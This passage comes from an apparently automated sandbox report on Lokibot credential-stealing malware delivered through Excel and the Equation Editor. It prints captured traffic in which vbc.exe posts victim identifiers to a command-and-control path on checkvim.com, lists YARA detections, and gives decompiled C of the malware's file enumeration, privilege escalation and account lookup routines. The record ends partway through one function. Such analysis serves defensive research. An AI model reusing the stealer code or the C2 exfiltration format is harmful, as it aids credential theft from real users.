                    Sep 28, 2021 06:51:35.236531973 CEST353OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:35.502118111 CEST354INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:46 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    98192.168.2.22492635.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:35.771485090 CEST354OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:35.843653917 CEST355OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:36.152519941 CEST355INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:47 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    99192.168.2.22492645.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:36.416966915 CEST356OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:36.487728119 CEST356OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:36.777894020 CEST356INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: EXCEL.EXE PID: 2688 Parent PID: 596

                    General

                    Start time:06:50:14
                    Start date:28/09/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f0f0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Chronological Activities

                    Analysis Process: EQNEDT32.EXE PID: 1484 Parent PID: 596

                    General

                    Start time:06:50:35
                    Start date:28/09/2021
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: vbc.exe PID: 1268 Parent PID: 1484

                    General

                    Start time:06:50:38
                    Start date:28/09/2021
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\vbc.exe'
                    Imagebase:0x400000
                    File size:210432 bytes
                    MD5 hash:59A67B5CCF01B6A564265797DC5E53E8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >

                      Analysis Process: vbc.exe PID: 1268 Parent PID: 1484 vbc.exeCOMMON

                      Executed Functions

                      Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				WCHAR* _t32;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t32 = E00405B6F(0, L"%s\\%s", _a4); // executed
					_t98 = _t32;
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}





















                      0x00403d82
                      0x00403d88
                      0x00403d8c
                      0x00403d8d
                      0x00403d90
                      0x00403ea9
                      0x00403ea9
                      0x00403eb4
                      0x00403eb9
                      0x00403ebb
                      0x00403ec0
                      0x00403f95
                      0x00403f95
                      0x00000000
                      0x00403f95
                      0x00403ece
                      0x00403edb
                      0x00403edd
                      0x00403ee2
                      0x00403f8e
                      0x00403f8f
                      0x00000000
                      0x00403f94
                      0x00000000
                      0x00403ee8
                      0x00403ef8
                      0x00403f0a
                      0x00403f12
                      0x00403f18
                      0x00403f26
                      0x00403f28
                      0x00403f2d
                      0x00000000
                      0x00000000
                      0x00403f33
                      0x00403f76
                      0x00403f7c
                      0x00000000
                      0x00403f83
                      0x00403f36
                      0x00403f3a
                      0x00000000
                      0x00403f40
                      0x00403f0c
                      0x00403f10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403f41
                      0x00403f41
                      0x00403f4b
                      0x00403f58
                      0x00403f5c
                      0x00403f88
                      0x00000000
                      0x00403f8d
                      0x00403f60
                      0x00000000
                      0x00403f60
                      0x00403ef8
                      0x00403ee8
                      0x00403da3
                      0x00403da9
                      0x00403ea6
                      0x00403ea8
                      0x00000000
                      0x00403ea8
                      0x00403db7
                      0x00403dc4
                      0x00403dc6
                      0x00403dcb
                      0x00403e9d
                      0x00403e9e
                      0x00403ea4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403dd1
                      0x00403dd1
                      0x00403dd8
                      0x00000000
                      0x00000000
                      0x00403de2
                      0x00403e12
                      0x00403e22
                      0x00403e30
                      0x00403e36
                      0x00403e3f
                      0x00403e44
                      0x00403e47
                      0x00403e4a
                      0x00403e4c
                      0x00000000
                      0x00000000
                      0x00403e63
                      0x00403e65
                      0x00403e6a
                      0x00403e6f
                      0x00403f64
                      0x00403f6a
                      0x00000000
                      0x00403f71
                      0x00000000
                      0x00403e6f
                      0x00403e26
                      0x00403e27
                      0x00403e2e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e2e
                      0x00403dea
                      0x00403df9
                      0x00000000
                      0x00000000
                      0x00403e01
                      0x00403e10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e75
                      0x00403e7f
                      0x00403e8c
                      0x00403e8e
                      0x00403e97
                      0x00000000

                      APIs
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID: %s\%s$%s\*$Program Files$Windows
                      • API String ID: 1690352074-2009209621
                      • Opcode ID: 63e1f370609dfed3717ff2c0158d5115428f49d0583d80af2640003a87fa6112
                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                      • Opcode Fuzzy Hash: 63e1f370609dfed3717ff2c0158d5115428f49d0583d80af2640003a87fa6112
                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                      0x00406512
                      0x00406514
                      0x00406522
                      0x00406524
                      0x00406530
                      0x00406534
                      0x0040653f
                      0x0040654e
                      0x00406552
                      0x0040655a
                      0x0040655f
                      0x0040656d
                      0x00406570
                      0x00406573
                      0x0040657a
                      0x00406589
                      0x0040658d
                      0x00406590
                      0x00406594
                      0x00000000
                      0x0040659a
                      0x004065a1

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                      • String ID: SeDebugPrivilege
                      • API String ID: 3615134276-2896544425
                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                      0x00402b8c
                      0x00402b92
                      0x00402b96
                      0x00402b9e
                      0x00402ba3
                      0x00402baa

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcess
                      • String ID:
                      • API String ID: 1357844191-0
                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                      0x00406077
                      0x00406082
                      0x00406085

                      APIs
                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                      Download Yara Rule
                      APIs
                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0022003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0022024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                      • Instruction ID: 65acc919516a519e085da2f084e51593b3e0a39d4d47a66df98e070ce9b82cc0
                      • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                      • Instruction Fuzzy Hash: 68526B74A11229DFDB64CF98D984BA8BBB1BF09304F1480D9E50DAB352DB30AE95DF14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004061C3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151COMMON
                      Download Yara Rule
                      C-Code - Quality: 81%
                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				WCHAR* _v8;
				long _v12;
				void** _v16;
				WCHAR* _v20;
				long _v24;
				long _v28;
				union _SID_NAME_USE _v32;
				intOrPtr* _t25;
				WCHAR* _t27;
				WCHAR* _t30;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t40;
				long _t44;
				intOrPtr* _t45;
				WCHAR* _t46;
				void* _t48;
				WCHAR* _t49;
				WCHAR* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

























                      0x004061c3
                      0x004061cb
                      0x004061cd
                      0x004061d0
                      0x004061de
                      0x004061e0
                      0x004061e5
                      0x004061e9
                      0x004061eb
                      0x004061ed
                      0x004061f2
                      0x0040622a
                      0x00406230
                      0x00406235
                      0x00406239
                      0x0040623b
                      0x00406244
                      0x00406249
                      0x00406249
                      0x0040624c
                      0x00406253
                      0x00406256
                      0x00406258
                      0x00406261
                      0x00406266
                      0x00406266
                      0x00406270
                      0x00406273
                      0x00406276
                      0x0040627b
                      0x0040627e
                      0x0040628c
                      0x0040628e
                      0x00406290
                      0x00406295
                      0x0040629a
                      0x0040629e
                      0x004062a0
                      0x004062ac
                      0x004062af
                      0x004062b7
                      0x004062b9
                      0x004062c9
                      0x004062e0
                      0x004062e2
                      0x004062e4
                      0x004062f3
                      0x004062f3
                      0x004062e4
                      0x004062f8
                      0x004062fd
                      0x004062a0
                      0x004062fe
                      0x00406302
                      0x00406307
                      0x0040630c
                      0x0040630d
                      0x0040630f
                      0x00406312
                      0x00406317
                      0x00406318
                      0x0040631c
                      0x0040631e
                      0x00406321
                      0x00406326
                      0x00000000
                      0x00406327
                      0x004061f4
                      0x004061ff
                      0x00406208
                      0x00406218
                      0x0040621d
                      0x00406224
                      0x00406226
                      0x00406228
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406228
                      0x00406201
                      0x00000000

                      APIs
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                      • _wmemset.LIBCMT ref: 00406244
                      • _wmemset.LIBCMT ref: 00406261
                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                      • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: _wmemset$AccountErrorInformationLastLookupToken
                      • String ID: IDA$IDA
                      • API String ID: 3235442692-2020647798
                      • Opcode ID: b5c259f51cf81ba60fe4671b0bf7c14c4b72ea2c04a500f591613783879ebe02
                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                      • Opcode Fuzzy Hash: b5c259f51cf81ba60fe4671b0bf7c14c4b72ea2c04a500f591613783879ebe02
